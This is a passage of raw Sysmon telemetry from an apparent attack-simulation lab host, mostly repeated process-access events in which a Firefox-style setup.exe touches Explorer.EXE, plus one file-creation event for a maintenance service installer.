13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe2021-01-18 13:59:52.396 10341000x800000000000000015016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(w